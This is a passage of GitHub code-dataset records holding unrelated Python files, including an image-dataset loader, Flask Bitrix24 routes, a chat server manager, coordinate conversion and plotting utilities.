get_int(\"Train time: \")\n # if correct arrival time is given, but it is before departure time, function repeats, stopping only when arrival time is fully validated\n if time < t1:\n get_valid_down_time(t1, timings)\n\n return time\n","repo_name":"Dinoman44/PreReleaseSolution","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30629292565","text":"import os\r\nimport cv2\r\nimport random\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.data import Dataset\r\n\r\nimport util.dataset_aug as DA\r\n\r\ndef get_heads_train(path):\r\n # read a folder, return the image name\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n head = filespath.split('_')[0]\r\n if head not in ret:\r\n ret.append(head)\r\n return ret\r\n\r\ndef get_heads_train_patch(path):\r\n # read a folder, return the image name\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n head = filespath.split('_')[0] + '_' + filespath.split('_')[1]\r\n if head not in ret:\r\n ret.append(head)\r\n return ret\r\n\r\ndef get_raw_test(path):\r\n # read a folder, return the complete path\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n if filespath[-4:] == '.raw':\r\n ret.append(os.path.join(root, filespath))\r\n return ret\r\n\r\nclass QuadBayer2RGB_Dataset(Dataset):\r\n def __init__(self, opt):\r\n self.opt = opt\r\n\r\n # Build training dataset\r\n self.train_list = get_heads_train(opt.baseroot_train)\r\n self.train_blur_patch_list = get_heads_train_patch(opt.baseroot_train_blur_patch)\r\n self.train_salient_patch_list = get_heads_train_patch(opt.baseroot_train_salient_patch)\r\n self.train_joint_patch_list = get_heads_train_patch(opt.baseroot_train_joint_patch)\r\n\r\n # Specify the pos for short and long exposure pixels\r\n if opt.short_expo_per_pattern == 2:\r\n self.short_pos = [[0,0], [1,1]]\r\n self.long_pos = [[0,1], [1,0]]\r\n if opt.short_expo_per_pattern == 3:\r\n self.short_pos = [[0,0], [0,1], [1,0]]\r\n self.long_pos = [[1,1]]\r\n\r\n def random_crop_start(self, h, w, crop_size, min_divide):\r\n rand_h = random.randint(0, h - crop_size)\r\n rand_w = random.randint(0, w - crop_size)\r\n rand_h = (rand_h // min_divide) * min_divide\r\n rand_w = (rand_w // min_divide) * min_divide\r\n return rand_h, rand_w\r\n \r\n def get_train_img(self):\r\n train_rid = random.randint(0, len(self.train_list) - 1)\r\n train_img_input_path = os.path.join(self.opt.baseroot_train, self.train_list[train_rid] + self.opt.ablation_data + '.png')\r\n train_img_rawout_path = os.path.join(self.opt.baseroot_train, self.train_list[train_rid] + '_quadbayer_short.png')\r\n train_img_rgbout_path = os.path.join(self.opt.baseroot_train, self.train_list[train_rid] + '_rgb_gt.png')\r\n train_img_input = cv2.imread(train_img_input_path, -1)\r\n train_img_rawout = cv2.imread(train_img_rawout_path, -1)\r\n train_img_rgbout = cv2.imread(train_img_rgbout_path, -1)\r\n return train_img_input, train_img_rawout, train_img_rgbout\r\n \r\n def get_blur_patch(self):\r\n train_blur_patch_rid = random.randint(0, len(self.train_blur_patch_list) - 1)\r\n train_blur_patch_input_path = os.path.join(self.opt.baseroot_train_blur_patch, self.train_blur_patch_list[train_blur_patch_rid] + self.opt.ablation_data + '.png')\r\n train_blur_patch_rawout_path = os.path.join(self.opt.baseroot_train_blur_patch, self.train_blur_patch_list[train_blur_patch_rid] + '_quadbayer_short.png')\r\n train_blur_patch_rgbout_path = os.path.join(self.opt.baseroot_train_blur_patch, self.train_blur_patch_list[train_blur_patch_rid] + '_rgb_gt.png')\r\n train_blur_patch_input = cv2.imread(train_blur_patch_input_path, -1)\r\n train_blur_patch_rawout = cv2.imread(train_blur_patch_rawout_path, -1)\r\n train_blur_patch_rgbout = cv2.imread(train_blur_patch_rgbout_path, -1)\r\n return train_blur_patch_input, train_blur_patch_rawout, train_blur_patch_rgbout\r\n \r\n def get_salient_patch(self):\r\n train_salient_patch_rid = random.randint(0, len(self.train_salient_patch_list) - 1)\r\n train_salient_patch_input_path = os.path.join(self.opt.baseroot_train_salient_patch, self.train_salient_patch_list[train_salient_patch_rid] + self.opt.ablation_data + '.png')\r\n train_salient_patch_rawout_path = os.path.join(self.opt.baseroot_train_salient_patch, self.train_salient_patch_list[train_salient_patch_rid] + '_quadbayer_short.png')\r\n train_salient_patch_rgbout_path = os.path.join(self.opt.baseroot_train_salient_patch, self.train_salient_patch_list[train_salient_patch_rid] + '_rgb_gt.png')\r\n train_salient_patch_input = cv2.imread(train_salient_patch_input_path, -1)\r\n train_salient_patch_rawout = cv2.imread(train_salient_patch_rawout_path, -1)\r\n train_salient_patch_rgbout = cv2.imread(train_salient_patch_rgbout_path, -1)\r\n return train_salient_patch_input, train_salient_patch_rawout, train_salient_patch_rgbout\r\n \r\n def get_joint_patch(self):\r\n train_joint_patch_rid = random.randint(0, len(self.train_joint_patch_list) - 1)\r\n train_joint_patch_input_path = os.path.join(self.opt.baseroot_train_joint_patch, self.train_joint_patch_list[train_joint_patch_rid] + self.opt.ablation_data + '.png')\r\n train_joint_patch_rawout_path = os.path.join(self.opt.baseroot_train_joint_patch, self.train_joint_patch_list[train_joint_patch_rid] + '_quadbayer_short.png')\r\n train_joint_patch_rgbout_path = os.path.join(self.opt.baseroot_train_joint_patch, self.train_joint_patch_list[train_joint_patch_rid] + '_rgb_gt.png')\r\n train_joint_patch_input = cv2.imread(train_joint_patch_input_path, -1)\r\n train_joint_patch_rawout = cv2.imread(train_joint_patch_rawout_path, -1)\r\n train_joint_patch_rgbout = cv2.imread(train_joint_patch_rgbout_path, -1)\r\n return train_joint_patch_input, train_joint_patch_rawout, train_joint_patch_rgbout\r\n\r\n def __getitem__(self, index):\r\n\r\n # Number of images\r\n num_train_img, num_blur_patch, num_salient_patch, num_joint_patch \\\r\n = self.opt.num_input[0], self.opt.num_input[1], self.opt.num_input[2], self.opt.num_input[3]\r\n\r\n # Read images\r\n train_img_input, train_img_rawout, train_img_rgbout = self.get_train_img()\r\n if num_blur_patch > 0:\r\n train_blur_patch_input, train_blur_patch_rawout, train_blur_patch_rgbout = self.get_blur_patch()\r\n if num_salient_patch > 0:\r\n train_salient_patch_input, train_salient_patch_rawout, train_salient_patch_rgbout = self.get_salient_patch()\r\n if num_joint_patch > 0:\r\n train_joint_patch_input, train_joint_patch_rawout, train_joint_patch_rgbout = self.get_joint_patch()\r\n\r\n # Extract patches\r\n input_list = []\r\n rawout_list = []\r\n rgbout_list = []\r\n for i in range(num_train_img):\r\n h, w = train_img_input.shape[:2]\r\n rand_h, rand_w = self.random_crop_start(h, w, self.opt.crop_size, 4)\r\n input_list.append(train_img_input[rand_h:rand_h+self.opt.crop_size, rand_w:rand_w+self.opt.crop_size])\r\n rawout_list.append(train_img_rawout[rand_h:rand_h+self.opt.crop_size, rand_w:rand_w+self.opt.crop_size])\r\n rgbout_list.append(train_img_rgbout[rand_h:rand_h+self.opt.crop_size, rand_w:rand_w+self.opt.crop_size, :])\r\n if num_blur_patch > 0:\r\n input_list.append(train_blur_patch_input)\r\n rawout_list.append(train_blur_patch_rawout)\r\n rgbout_list.append(train_blur_patch_rgbout)\r\n if num_salient_patch > 0:\r\n input_list.append(train_salient_patch_input)\r\n rawout_list.append(train_salient_patch_rawout)\r\n rgbout_list.append(train_salient_patch_rgbout)\r\n if num_joint_patch > 0:\r\n input_list.append(train_joint_patch_input)\r\n rawout_list.append(train_joint_patch_rawout)\r\n rgbout_list.append(train_joint_patch_rgbout)\r\n\r\n # Post-process images\r\n input_processed = []\r\n rawout_processed = []\r\n rgbout_processed = []\r\n edgeout_processed = []\r\n for id in range(len(input_list)):\r\n \r\n ### build input images list\r\n img = input_list[id]\r\n # Normalization\r\n img = img.astype(np.float) / 16383.0\r\n # Add noises\r\n for pos in self.short_pos:\r\n img[pos[0]::2, pos[1]::2] /= 4\r\n img = DA.add_noise_raw(img, self.opt.noise_K, self.opt.noise_sigma)\r\n for pos in self.short_pos:\r\n img[pos[0]::2, pos[1]::2] *= 4\r\n img = np.clip(img, 0, 1)\r\n # Add gamma correction\r\n img = img ** (1 / 2.2)\r\n # To tensor\r\n input_processed.append(torch.from_numpy(img).float().unsqueeze(0).contiguous())\r\n\r\n ### build rawout images list\r\n img = rawout_list[id]\r\n # Normalization\r\n img = img.astype(np.float) / 16383.0\r\n # Add gamma correction\r\n img = img ** (1 / 2.2)\r\n # To tensor\r\n rawout_processed.append(torch.from_numpy(img).float().unsqueeze(0).contiguous())\r\n\r\n ### build rgbout / edgeout images list\r\n img = rgbout_list[id]\r\n # Normalization\r\n edge = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n edge = DA.sobel(edge)\r\n edge = edge.astype(np.float) / 255.0\r\n img = img.astype(np.float) / 255.0\r\n # To tensor\r\n rgbout_processed.append(torch.from_numpy(img).float().permute(2, 0, 1).contiguous())\r\n edgeout_processed.append(torch.from_numpy(edge).float().unsqueeze(0).contiguous())\r\n \r\n # Concatenate\r\n for id2 in range(len(input_processed)):\r\n if id2 == 0:\r\n input_batch = input_processed[id2].unsqueeze(0)\r\n rawout_batch = rawout_processed[id2].unsqueeze(0)\r\n rgbout_batch = rgbout_processed[id2].unsqueeze(0)\r\n edgeout_batch = edgeout_processed[id2].unsqueeze(0)\r\n else:\r\n input_batch = torch.cat((input_batch, input_processed[id2].unsqueeze(0)), 0)\r\n rawout_batch = torch.cat((rawout_batch, rawout_processed[id2].unsqueeze(0)), 0)\r\n rgbout_batch = torch.cat((rgbout_batch, rgbout_processed[id2].unsqueeze(0)), 0)\r\n edgeout_batch = torch.cat((edgeout_batch, edgeout_processed[id2].unsqueeze(0)), 0)\r\n input_batch = input_batch.contiguous()\r\n rawout_batch = rawout_batch.contiguous()\r\n rgbout_batch = rgbout_batch.contiguous()\r\n edgeout_batch = edgeout_batch.contiguous()\r\n \r\n sample = {'input_batch': input_batch,\r\n 'rawout_batch': rawout_batch,\r\n 'rgbout_batch': rgbout_batch,\r\n 'edgeout_batch': edgeout_batch}\r\n\r\n return sample\r\n \r\n def __len__(self):\r\n return 10000\r\n\r\nclass QuadBayer2RGB_Valset(Dataset):\r\n def __init__(self, opt):\r\n self.opt = opt\r\n self.blur_imglist = []\r\n self.sharp_imglist = []\r\n self.save_imglist = []\r\n\r\n # Build validation dataset\r\n imglist = get_heads_train(opt.baseroot_val)\r\n for i in range(len(imglist)):\r\n imgname = '%s%s_K%0.2f_sigma%0.1f.png' % (imglist[i], opt.ablation_data, opt.noise_K, opt.noise_sigma)\r\n self.blur_imglist.append(os.path.join(opt.baseroot_val, imgname))\r\n self.sharp_imglist.append(os.path.join(opt.baseroot_val, imglist[i] + '_rgb_gt.png'))\r\n self.save_imglist.append(imgname)\r\n\r\n def __getitem__(self, index):\r\n \r\n # Path of one image\r\n blur_img_path = self.blur_imglist[index]\r\n clean_img_path = self.sharp_imglist[index]\r\n save_img_path = self.save_imglist[index]\r\n\r\n in_img = cv2.imread(blur_img_path, -1)\r\n RGBout_img = cv2.imread(clean_img_path, -1)\r\n\r\n # Input images\r\n in_img = in_img.astype(np.float) / 16383.0\r\n in_img = in_img ** (1 / 2.2)\r\n in_img = torch.from_numpy(in_img).float().unsqueeze(0).contiguous()\r\n\r\n # Target images\r\n RGBout_img = RGBout_img.astype(np.float) / 255.0\r\n RGBout_img = torch.from_numpy(RGBout_img).float().permute(2, 0, 1).contiguous()\r\n\r\n return in_img, RGBout_img, save_img_path\r\n \r\n def __len__(self):\r\n return len(self.blur_imglist)\r\n\r\nif __name__ == \"__main__\":\r\n\r\n baseroot_test = 'F:\\\\QuadBayer Deblur\\\\data\\\\test\\\\test1'\r\n imglist = get_raw_test(baseroot_test)\r\n print(imglist)\r\n","repo_name":"zhaoyuzhi/QRNet","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12551,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71098985972","text":"from flask import Blueprint, render_template, request, make_response\nimport json\nimport pprint\nimport datetime\n\nfrom app.models import Lead, OfferV2, LeadComment, S3File, Order\n\nfrom ..utils import get_bitrix_auth_info\n\n\ndef register_routes(api: Blueprint):\n\n @api.route(\"/salesportal/\", methods=[\"GET\", \"POST\"])\n def salesportal():\n from app.modules.importer.sources.bitrix24._association import find_association\n from app.modules.importer.sources.bitrix24.lead import run_import\n from app.modules.importer.sources.bitrix24.order import run_import as order_import\n\n auth_info = get_bitrix_auth_info(request)\n lead = None\n if request.form.get(\"PLACEMENT\") == \"CRM_LEAD_DETAIL_TAB\":\n lead_id = json.loads(request.form.get(\"PLACEMENT_OPTIONS\"))[\"ID\"]\n lead_link = find_association(\"Lead\", remote_id=lead_id)\n if lead_link is None:\n run_import(remote_id=lead_id)\n lead_link = find_association(\"Lead\", remote_id=lead_id)\n if lead_link is None:\n return \"Lead not found\"\n lead = Lead.query.filter(Lead.id == lead_link.local_id).first()\n if lead is None:\n return \"Lead not found2\"\n if request.form.get(\"PLACEMENT\") == \"CRM_DEAL_DETAIL_TAB\":\n order_id = json.loads(request.form.get(\"PLACEMENT_OPTIONS\"))[\"ID\"]\n order_link = find_association(\"Order\", remote_id=order_id)\n if order_link is None:\n order_import(remote_id=order_id)\n order_link = find_association(\"Lead\", remote_id=lead_id)\n if order_link is None:\n return \"Order not found\"\n order = Order.query.filter(Order.id == order_link.local_id).first()\n lead = Lead.query.filter(Lead.customer_id == order.customer_id).first()\n if lead is None:\n return \"Order Lead not found\"\n if lead is not None:\n return render_template(\"salesportal/iframe.html\", lead=lead, auth_info=auth_info)\n return \"No Placement\"\n\n @api.route(\"/salesportal/install/\", methods=[\"POST\"])\n def salesportal_installer():\n return render_template(\"salesportal/install.html\")\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"app/modules/bitrix24/sections/salesportal.py","file_name":"salesportal.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862280694","text":"# Given an unsorted array of integers nums, return the length of the longest consecutive elements sequence.\n\n# You must write an algorithm that runs in O(n) time.\n\n \n\n# Example 1:\n\n# Input: nums = [100,4,200,1,3,2]\n# Output: 4\n# Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.\n\n# Example 2:\n\n# Input: nums = [0,3,7,2,5,8,4,6,0,1]\n# Output: 9\n\n \n\n# Constraints:\n\n# 0 <= nums.length <= 105\n# -109 <= nums[i] <= 109\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n nums = set(nums)\n best = 0\n \n for num in nums:\n \n if (num -1) not in nums:\n y = num + 1\n while y in nums:\n y += 1\n best = max(best,y-num)\n return best\n\n# Time complexity is O(N)\n\n# Space complexity is O(N)","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/Graph/longestConsecutiveSequence.py","file_name":"longestConsecutiveSequence.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30474399679","text":"from .. import messages\nfrom .. import logger\nfrom .. import config\nimport sys\nimport time\nimport select\nfrom .user import User\n\nclass Manager:\n def __init__(self, server_socket):\n self.users = []\n self.is_running = True\n self.admin = None\n self.muted_list = []\n self.server_socket = server_socket\n\n def wait(self):\n read_list, _, __ = select.select(self.users + [sys.stdin, self.server_socket], [], [])\n return read_list\n\n def add_user(self, user: User):\n if self.admin is None:\n self.admin = user\n self.users.append(user)\n self.announce(f'{user.name} joined the server.')\n\n def answer_client(self, client: User):\n # Controller function\n message = client.receive_message()\n\n if message is None:\n self.disconnect_client(client)\n\n data = messages.MessageData(message)\n\n if data.mtp == 'SendChat':\n if client not in self.muted_list:\n self.send_chat_from_user(client, data.message)\n else:\n client.send_message(messages.ServerMessage('You are muted.'))\n\n elif data.mtp == 'Disconnect':\n self.disconnect_client(client)\n\n elif data.mtp == 'SetUsername':\n self.set_username(client, data.name)\n\n elif data.mtp == 'RequestUserInfo':\n found_user = False\n for user in self.users:\n if user.name == data.name:\n client.send_message(messages.ProvideUserInfo(user))\n found_user = True\n if not found_user:\n client.send_message(messages.ProvideUserInfo(None, status='UserDoesNotExist'))\n\n elif data.mtp == 'RequestLocalTime':\n client.send_message(messages.SendLocalTime())\n\n elif data.mtp == 'WhisperToUser':\n if client not in self.muted_list:\n for user in self.users:\n if user.name in data.to_users:\n user.send_message(messages.WhisperFromUser(client.name, data.message))\n else:\n client.send_message(messages.ServerMessage('You are muted.'))\n\n elif data.mtp == 'RequestOnlineList':\n client.send_message(messages.SendOnlineList([user.name for user in self.users]))\n\n elif data.mtp == 'KickUser':\n if client is self.admin:\n found_user = False\n for user in self.users:\n if user.name in data.name:\n client.send_message(messages.KickUser(status='OK'))\n self.disconnect_client(user, 'Kicked from the server.')\n self.announce(f'{user.name} has been kicked from the server.')\n found_user = True\n \n if not found_user:\n client.send_message(messages.KickUser(status='UserDoesNotExist'))\n else:\n client.send_message(messages.KickUser(status='NotAdminError'))\n\n elif data.mtp == 'MuteUser':\n if client is self.admin:\n found_user = False\n for user in self.users:\n if user.name in data.name:\n if user not in self.muted_list:\n self.muted_list.append(user)\n self.announce(f'{user.name} has been muted.')\n client.send_message(messages.MuteUser(status='OK'))\n else:\n client.send_message(messages.MuteUser(status=\"UserAlreadyMuted\"))\n found_user = True\n \n if not found_user:\n client.send_message(messages.MuteUser(status='UserDoesNotExist'))\n else:\n client.send_message(messages.MuteUser(status='NotAdminError'))\n\n elif data.mtp == 'UnmuteUser':\n if client is self.admin:\n found_user = False\n for user in self.users:\n if user.name in data.name:\n if user in self.muted_list:\n self.muted_list.remove(user)\n self.announce(f'{user.name} has been unmuted.')\n client.send_message(messages.UnmuteUser(status='OK'))\n else:\n # what if hindi pala siya muted in the first place.\n client.send_message(messages.MuteUser(status=\"UserNotMuted\"))\n found_user = True\n \n if not found_user:\n client.send_message(messages.UnmuteUser(status='UserDoesNotExist'))\n else:\n client.send_message(messages.UnmuteUser(status='NotAdminError'))\n\n elif data.mtp == 'SetAsAdmin':\n if client is self.admin:\n found_user = False\n for user in self.users:\n if user.name in data.name:\n if user is client:\n client.send_message(messages.SetAsAdmin(status='AlreadyAdmin'))\n else:\n self.admin = user\n self.announce(f'{user.name} is now the admin.')\n client.send_message(messages.SetAsAdmin(status='OK'))\n found_user = True\n \n if not found_user:\n client.send_message(messages.SetAsAdmin(status='UserDoesNotExist'))\n else:\n client.send_message(messages.SetAsAdmin(status='NotAdminError'))\n\n else:\n logger.error('Unsupported message type received!')\n\n def send_chat_from_user(self, from_user, message):\n for to_user in self.users:\n if from_user is not to_user:\n to_user.send_message(messages.SendChatFromUser(from_user.name, message))\n logger.chat(f'{from_user.name}: {message}')\n\n def disconnect_client(self, outgoing_client: User, reason=''):\n if outgoing_client is self.admin:\n found_user = False\n for user in self.users:\n if user is not outgoing_client:\n self.admin = user\n found_user = True\n break\n if found_user:\n self.announce(f'{self.admin.name} is now the admin.')\n else:\n self.admin = None\n\n if outgoing_client in self.muted_list:\n self.muted_list.remove(outgoing_client)\n\n if outgoing_client.is_connected:\n outgoing_client.send_message(messages.Disconnect(reason))\n logger.debug(f'Disconnected {outgoing_client}')\n else:\n logger.warning(f'Client ({outgoing_client}) disconnected unexpectedly.')\n\n self.users.remove(outgoing_client)\n if not reason:\n self.announce(f'{outgoing_client.name} left the server.')\n\n outgoing_client.close()\n\n def announce(self, server_message):\n for user in self.users:\n user.send_message(messages.ServerMessage(server_message))\n logger.info(server_message)\n\n def handshake(self, client: User):\n request = client.receive_message()\n\n if request['mtp'] != 'Login':\n logger.error(f'MTP Mismatch! Expected: Login. Got: {request[\"mtp\"]}')\n return False\n else:\n requested_name = request['data']['name']\n\n if self.check_name(requested_name):\n logger.error(f'Client requested name already exists! Disconnecting.')\n client.send_message(messages.AssignUsername(requested_name, status='DuplicateError'))\n return False\n\n else:\n client.send_message(messages.AssignUsername(requested_name))\n client.set_name(requested_name)\n return True\n\n def set_username(self, user, new_name):\n if self.check_name(new_name):\n logger.error(f'Requested name already exists!')\n user.send_message(messages.SetUsername(user.name, 'DuplicateError'))\n\n else:\n self.announce(f'{user.name} has changed username to {new_name}.')\n user.name = new_name\n user.send_message(messages.SetUsername(user.name))\n\n\n def shutdown(self):\n logger.info('Disconnecting all clients.')\n for user in self.users:\n self.disconnect_client(user, \"Server is shutting down.\")\n logger.info('Disconnected all clients. Server now shutting down.')\n self.is_running = False\n\n def check_name(self, name):\n for user in self.users:\n if name == user.name:\n return True\n return False\n\n def purge_clients(self):\n # Supposedly kick all clients that have not responded to a keepAlive packet\n pass","repo_name":"digitalsirkeith/coe151personal","sub_path":"library/server/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34969430205","text":"from load_data import load_DBs\nfrom plot_functions import plot_all\nfrom plot_types import TypePlotter\nfrom laplace_tests import calc_laplace as claplace\n\nclass Mydata:\n def __init__(self, load):\n if load:\n (self.dsatable, self.src2dsa, self.dsa2cve, self.cvetable, self.src2month, self.src2sloccount, self.src2pop, self.src2deps, self.pkg_with_cvss, self.src2cwe) = load_DBs()\n else:\n print('no load command given')\n\ndef main():\n data = Mydata(True)\n print('Done')\n i = plot_all(data.src2month, data.src2sloccount, data.pkg_with_cvss)\n #\n years = 19\n # 2000-2018\n \n j = TypePlotter(data, years)\n j.plot_types()\n\n sum_linux = 0\n for num in data.src2month['linux'][:-12]:\n sum_linux += num\n print(sum_linux)\n\n #l = claplace(data,years)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nikalexo/DVAF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37908039829","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 29 16:57:44 2021\r\n\r\n@author: cuch9001\r\n\"\"\"\r\n\r\nimport geopandas as gpd\r\nfrom xyconvert import wgs2gcj\r\nimport numpy as np\r\nfrom shapely.geometry import mapping, shape, MultiPolygon\r\n\r\ndef coord_trans(geom):\r\n if geom.geom_type == 'MultiPolygon':\r\n return MultiPolygon([coord_trans(i) for i in geom.geoms])\r\n if geom.geom_type == 'Polygon':\r\n geojson = mapping(geom)\r\n geojson['coordinates'] = tuple([tuple(map(tuple, wgs2gcj(np.array(geojson['coordinates'][0])))),])\r\n return shape(geojson)\r\n\r\ntest = gpd.read_file('C:/Users/cuch9001/Desktop/行政边界/C11_3_region_GCJ02.shp').to_crs('epsg:4030')\r\n\r\ntest1 = test.copy()\r\n\r\ntest1['geometry'] = test1['geometry'].apply(lambda x: coord_trans(x))\r\n\r\nmapping(test['geometry'][66])['coordinates'][0][0][0]\r\nmapping(test1['geometry'][66])['coordinates'][0][0][0]\r\n","repo_name":"choeycui/func_record","sub_path":"coord_convert.py","file_name":"coord_convert.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38175622287","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag()\ndef lista_de_zonas(tecnologia):\n zonas = \"\"\n for localidad in tecnologia.localidades.all():\n zona = localidad.get_zona_display()\n if len(zonas) == 0:\n zonas = zona\n elif zona not in zonas:\n zonas += \", {0}\".format(zona)\n return zonas\n\n\n@register.simple_tag()\ndef lista_de_territorios(tecnologia):\n territorios = \"\"\n for localidad in tecnologia.localidades.all():\n territorio = localidad.get_territorio_display()\n if len(territorios) == 0:\n territorios = territorio\n elif territorio not in territorios:\n territorios += \", {0}\".format(territorio)\n return territorios\n","repo_name":"numiescl/catalogo_tecnologias_locales","sub_path":"catalogo/templatetags/catalogo_tags.py","file_name":"catalogo_tags.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14459769821","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport galsim\n\nimport _mypath\nimport chroma\n\ndef loadcat():\n return np.load('indata/opsim.npy')\n\ndef lensing_visits(cat):\n r_cond = cat['filter'] == 'r'\n i_cond = cat['filter'] == 'i'\n X_cond = cat['airmass'] < 1.5\n return (r_cond | i_cond) & X_cond\n\ndef plot_field(cat, field, filter_name, align_SED_file, target_SED_file, target_z, ax,\n label, **kwargs):\n wobj = (cat['fieldID'] == field) & (cat['filter'] == filter_name)\n\n data_dir = '../../data/'\n filter_dir = data_dir+'filters/'\n SED_dir = data_dir+'SEDs/'\n align_SED = galsim.SED(SED_dir+align_SED_file)\n target_SED = galsim.SED(SED_dir+target_SED_file)\n bandpass = galsim.Bandpass(filter_dir+\"LSST_{}.dat\".format(filter_name))\n\n align_moments = align_SED.calculateDCRMomentShifts(bandpass,\n zenith_angle = np.pi/4.0 * galsim.radians)\n target_moments = target_SED.calculateDCRMomentShifts(bandpass,\n zenith_angle = np.pi/4.0 * galsim.radians)\n\n # milliarcseconds\n delta_R = (target_moments[0][1,0] - align_moments[0][1,0]) * 180./np.pi * 3600 * 1000\n # square arcseconds\n delta_V = (target_moments[1][1,1] - align_moments[1][1,1]) * (180./np.pi * 3600)**2\n\n rsquared = 0.4**2 # square arcseconds\n m = delta_V * np.tan(cat[wobj]['z_a'])**2 / rsquared\n\n r = delta_R * np.tan(cat[wobj]['z_a'])\n q = cat[wobj]['q']\n\n x0 = r * np.sin(q)\n y0 = r * np.cos(q)\n x1 = (r + m*2000) * np.sin(q)\n y1 = (r + m*2000) * np.cos(q)\n for i, (x00, x11, y00, y11) in enumerate(zip(x0, x1, y0, y1)):\n if i == 0:\n ax.plot([x00, x11], [y00, y11], label=label, **kwargs)\n else:\n ax.plot([x00, x11], [y00, y11], **kwargs)\n ax.plot([-80, -80 + 2000*0.01], [80, 80], color='black')\n ax.text(-82, 83, 'm=0.01', size=14)\n\nif __name__ == '__main__':\n\n fig = plt.figure(figsize=(5.5,5))\n ax = fig.add_subplot(111)\n ax.set_xlim(-100, 100)\n ax.set_ylim(-100, 100)\n ax.set_xlabel('$\\Delta$ RA (mas)', fontsize=18)\n ax.set_ylabel('$\\Delta$ DEC (mas)', fontsize=18)\n ax.scatter([0], [0], s=150, marker='+', color='black', linewidth=2.5)\n ax.grid()\n\n cat = loadcat()\n cat = cat[lensing_visits(cat)]\n plot_field(cat, 598, 'r', 'ukg5v.ascii', 'KIN_Sa_ext.ascii', 1.2, ax,\n label='Sa gal', color='blue')\n plot_field(cat, 598, 'r', 'ukg5v.ascii', 'ukm5v.ascii', 1.2, ax,\n label='M5v star', color='magenta')\n plot_field(cat, 598, 'r', 'ukg5v.ascii', 'CWW_E_ext.ascii', 1.2, ax,\n label='E gal', color='red')\n\n plot_field(cat, 2036, 'r', 'ukg5v.ascii', 'KIN_Sa_ext.ascii', 1.2, ax,\n label='_no_legend_', color='blue', alpha=0.5)\n plot_field(cat, 2036, 'r', 'ukg5v.ascii', 'ukm5v.ascii', 1.2, ax,\n label='_no_legend_', color='magenta', alpha=0.5)\n plot_field(cat, 2036, 'r', 'ukg5v.ascii', 'CWW_E_ext.ascii', 1.2, ax,\n label='_no_legend_', color='red', alpha=0.5)\n ax.legend(fontsize=14)\n ax.tick_params(axis='both', which='major', labelsize=18)\n fig.tight_layout()\n #plt.show()\n import os\n if not os.path.isdir('output/'):\n os.mkdir('output/')\n plt.savefig('output/relative_alignment.png', dpi=220)\n","repo_name":"LSSTDESC/chroma","sub_path":"bin/opsim/relative_alignment.py","file_name":"relative_alignment.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"41194326834","text":"import os\nimport pathlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport tensorflow_probability as tfp\n\n\ndef save2Vis(figname):\n \"\"\" a shortcut function to save plot to visualization dir \n\n Note\n ----\n\n We simply assume that every repo will have a 'visulizations' \n dir under the root directory\n \"\"\"\n\n axe = plt.gca()\n plt.savefig(f'visualization/{figname}.pdf',\n format='pdf', dpi=300, bbox_inches='tight')\n\n\ndef save_a_plot(fname, save_dir):\n plt.gcf()\n plt.savefig(fname=os.path.join(save_dir, fname),\n dpi=300,\n format='pdf',\n bbox_inches='tight')\n plt.close()\n\n\ndef cd_root_dir():\n # change directory to the path of the root directory of the project\n\n ref_path = os.path.abspath('')\n ref_path = pathlib.Path(ref_path).resolve().parents[1]\n os.chdir(ref_path)\n print(\"current directory:\", os.getcwd())\n\n\ndef sin_transformer(period, x):\n return np.sin(x * 2 * np.pi * (1 / period))\n\n\ndef cos_transformer(period, x):\n return np.cos(x * 2 * np.pi * (1 / period))\n\n\ndef pl_residual(gt, preds, low=2, limit=4):\n \"\"\" residual plots of deterministic models \"\"\"\n\n fig, ax = plt.subplots()\n ax.scatter(preds, gt, color='blue', alpha=0.2)\n\n # diagonal line\n ax.plot(np.arange(low, limit, 0.01), np.arange(\n low, limit, 0.01), color='gray', ls='--')\n\n ax.set_xlabel('Predicted revenue in million')\n ax.set_ylabel('Ground truth revenue in million')\n ax.set_title('Ground truth v.s. Predicted revenue')\n\n\ndef pl_residual_horizontal(gt, preds, low=2, limit=4):\n \"\"\" residual plots of deterministic models \"\"\"\n\n fig, ax = plt.subplots()\n residual = gt - np.squeeze(preds)\n ax.scatter(preds, residual, color='blue', alpha=0.2)\n hl = np.arange(low, limit, 0.01)\n # horizontal line\n 